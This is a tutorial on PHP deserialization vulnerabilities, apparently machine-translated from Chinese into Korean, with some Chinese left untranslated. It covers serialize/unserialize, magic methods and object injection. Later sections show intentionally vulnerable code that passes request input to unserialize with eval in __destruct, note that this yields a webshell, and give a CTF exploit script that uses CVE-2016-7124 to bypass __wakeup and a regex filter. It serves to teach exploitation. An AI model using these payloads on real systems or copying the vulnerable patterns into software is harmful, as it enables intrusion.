PHP 역직렬화에 대한 자세한 설명

ㅋㅋㅋ

"PHP의 모든 값은 serialize() 함수를 사용하여 바이트 스트림이 포함된 문자열을 반환함으로써 표현할 수 있습니다. 객체를 직렬화하면 객체의 모든 변수가 저장되지만 객체의 메서드는 저장되지 않습니다. , 클래스만 저장됩니다. "처음에는 이 개념이 헷갈릴 수도 있지만 점차 이해하게 됩니다.

프로그램 실행이 끝나면 메모리 데이터는 즉시 소멸되며, 변수에 저장된 데이터는 소멸됩니다. 는 메모리 데이터이고 파일입니다. 데이터베이스는 "영구 데이터"이므로 PHP 직렬화는 메모리의 가변 데이터를 파일의 영구 데이터에 "저장"하는 프로세스입니다.

관련 학습 권장 사항:

엔트리에서 마스터까지의 PHP 프로그래밍

 $s = serialize($变量); //该函数将变量数据进行序列化转换为字符串
 file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

구체적인 예를 통해 직렬화에 대해 알아 보겠습니다.

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39;is&#39;.$this->age.&#39;years old. <br />&#39;;
  }
}
//创建一个对象
$user = new User();
// 设置数据
$user->age = 20;
$user->name = &#39;daye&#39;;

//输出数据
$user->PrintData();
//输出序列化之后的数据
echo serialize($user);

?>

결과는 다음과 같습니다.

객체 직렬화를 볼 수 있습니다. 객체는 나중에 저장될 예정이며, 직렬화된 결과에는 한 문자가 있는 것으로 나타났으며, 이 문자는 다음 문자의 약어입니다.

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

약어의 유형 문자를 이해하면 PHP 직렬화 형식을 얻을 수 있습니다

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

위의 예를 통해 serialize() 함수를 통해 바이트 스트림이 포함된 문자열을 반환한다는 개념을 이해할 수 있습니다.

3 unserialize() 함수

는 직렬화된 단일 변수에 대해 작동하고 이를 다시 PHP 값으로 변환합니다. 개체를 역직렬화하기 전에 개체의 클래스를 역직렬화하기 전에 정의해야 합니다.

쉽게 이해하자면, 파일에 저장된 직렬화된 데이터를 프로그램 코드의 변수 표현으로 복원하고, 변수 직렬화 이전의 결과를 복원하는 과정입니다.

 $s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容（之前序列化过的字符串）
 $变量 = unserialize($s); //将该文本内容，反序列化到指定的变量中

예를 통해 역직렬화에 대해 알아보세요.

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39; is &#39;.$this->age.&#39; years old. <br />&#39;;
  }
}
//重建对象
$user = unserialize(&#39;O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}&#39;);

$user->PrintData();

?>

결과는 다음과 같습니다.

참고: 개체를 역직렬화하기 전에 개체의 클래스를 정의해야 합니다. 그렇지 않으면 오류가 보고됩니다. unserialize()

4 PHP 역직렬화 취약점

취약점을 배우기 전에 먼저 PHP 매직 함수를 이해합시다. 이는 다음 연구에 매우 도움이 될 것입니다.

PHP는 모두 __( 두 개의 밑줄)은 매직 메소드로 예약되어 있습니다

__construct  当一个对象创建时被调用，
__destruct  当一个对象销毁时被调用，
__toString  当一个对象被当作一个字符串被调用。
__wakeup()  使用unserialize时触发
__sleep()  使用serialize时触发
__destruct()  对象被销毁时触发
__call()  在对象上下文中调用不可访问的方法时触发
__callStatic()  在静态上下文中调用不可访问的方法时触发
__get()  用于从不可访问的属性读取数据
__set()  用于将数据写入不可访问的属性
__isset()  在不可访问的属性上调用isset()或empty()触发
__unset()   在不可访问的属性上使用unset()时触发
__toString()  把类当作字符串使用时触发,返回值需要为字符串
__invoke()  当脚本尝试将对象调用为函数时触发

여기에는 매직 함수의 일부만 나열되어 있습니다.예를 사용하여 매직 함수의 자동 호출 과정을 이해해 보겠습니다

<?php
class test{
 public $varr1="abc";
 public $varr2="123";
 public function echoP(){
 echo $this->varr1."<br>";
 }
 public function __construct(){
 echo "__construct<br>";
 }
 public function __destruct(){
 echo "__destruct<br>";
 }
 public function __toString(){
 return "__toString<br>";
 }
 public function __sleep(){
 echo "__sleep<br>";
 return array(&#39;varr1&#39;,&#39;varr2&#39;);
 }
 public function __wakeup(){
 echo "__wakeup<br>";
 }
}

$obj = new test(); //实例化对象，调用__construct()方法，输出__construct
$obj->echoP();  //调用echoP()方法，输出"abc"
echo $obj;  //obj对象被当做字符串输出，调用__toString()方法，输出__toString
$s =serialize($obj); //obj对象被序列化，调用__sleep()方法，输出__sleep
echo unserialize($s); //$s首先会被反序列化，会调用__wake()方法，被反序列化出来的对象又被当做字符串，就会调用_toString()方法。
// 脚本结束又会调用__destruct()方法，输出__destruct
?>

결과는 다음과 같습니다.

이 예를 통해 해당 조건이 충족되면 매직 함수가 호출되는 것을 명확하게 알 수 있습니다.

5 객체 주입

사용자의 요청이 deserialization 함수 unserialize()에 전달되기 전에 제대로 필터링되지 않으면 취약점이 발생합니다. PHP는 개체 직렬화를 허용하기 때문에 공격자는 특정 직렬화된 문자열을 취약한 직렬화 해제 함수에 제출할 수 있으며 궁극적으로 응용 프로그램 범위 내에서 임의의 PHP 개체가 주입될 수 있습니다.

객체 취약점은 두 가지 전제 조건을 충족해야 합니다.

1. 직렬화 해제 매개변수는 제어 가능합니다.

2. 코드에 매직 메소드를 포함하는 클래스가 정의되어 있는데, 메소드에서 클래스 멤버 변수를 매개변수로 사용하는 보안 문제가 있는 함수가 일부 있습니다.

예를 들어 봅시다:

<?php
class A{
  var $test = "demo";
  function __destruct(){
      echo $this->test;
  }
}
$a = $_GET[&#39;test&#39;];
$a_unser = unserialize($a);
?>

예를 들어, 이 예에서는 사용자 생성 콘텐츠가 unserialize() 함수에 직접 전달된 다음 그러한 명령문을 구성할 수 있습니다

?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}

_destruct 함수는 스크립트 후에 호출됩니다 실행이 완료되고 동시에 테스트 변수를 덮어쓰고 레몬을 출력합니다.

이 취약점을 발견한 후 이 취약점 지점을 사용하여 입력 변수를 제어하고 이를 직렬화된 개체에 연결할 수 있습니다.

또 다른 예를 보세요:

<?php
class A{
  var $test = "demo";
  function __destruct(){
    @eval($this->test);//_destruct()函数中调用eval执行序列化对象中的语句
  }
}
$test = $_POST[&#39;test&#39;];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 构造序列化对象
$test_unser = unserialize($pp); // 反序列化同时触发_destruct函数
?>

사실 자세히 살펴보면 unserialize() 함수가 __destruc() 함수를 트리거할 수 있도록 직렬화된 개체를 수동으로 구성한 다음 악성 명령문을 실행할 수 있다는 것을 알 수 있습니다. __destruct() 함수에서.

이 취약점을 사용하여 웹 셸을 얻을 수 있습니다

6 마법 함수의 역직렬화 우회

wakeup() 마법 함수 우회

PHP5<5.6.25
PHP7<7.0.10

PHP 역직렬화 취약점 CVE-2016-7124

#a#重点：当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 __wakeup 函数的执行

百度杯——Hash

其实仔细分析代码，只要我们能绕过两点即可得到f15g_1s_here.php的内容

（1）绕过正则表达式对变量的检查
（2）绕过_wakeup()魔法函数，因为如果我们反序列化的不是Gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转成Gu3ss_m3_h2h2.php

那么问题就来了，如果绕过正则表达式
（1）/[oc]:\d+:/i，例如：o:4:这样就会被匹配到,而绕过也很简单，只需加上一个+,这个正则表达式即匹配不到0:+4:

（2）绕过_wakeup()魔法函数，上面提到了当反序列化字符串中，表示属性个数的值大于真实属性个数时，会绕过 _wakeup 函数的执行

编写php序列化脚本

<?php
class Demo {
  private $file = &#39;Gu3ss_m3_h2h2.php&#39;;

  public function __construct($file) {
    $this->file = $file;
  }

  function __destruct() {
    echo @highlight_file($this->file, true);
  }

  function __wakeup() {
    if ($this->file != &#39;Gu3ss_m3_h2h2.php&#39;) {
      //the secret is in the f15g_1s_here.php
      $this->file = &#39;Gu3ss_m3_h2h2.php&#39;;
    }
  }
}
#先创建一个对象，自动调用__construct魔法函数
$obj = new Demo(&#39;f15g_1s_here.php&#39;);
#进行序列化
$a = serialize($obj);
#使用str_replace() 函数进行替换，来绕过正则表达式的检查
$a = str_replace(&#39;O:4:&#39;,&#39;O:+4:&#39;,$a);
#使用str_replace() 函数进行替换，来绕过__wakeup()魔法函数
$a = str_replace(&#39;:1:&#39;,&#39;:2:&#39;,$a);
#再进行base64编码
echo base64_encode($a);
?>

위 내용은 PHP 역직렬화에 대한 자세한 설명의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!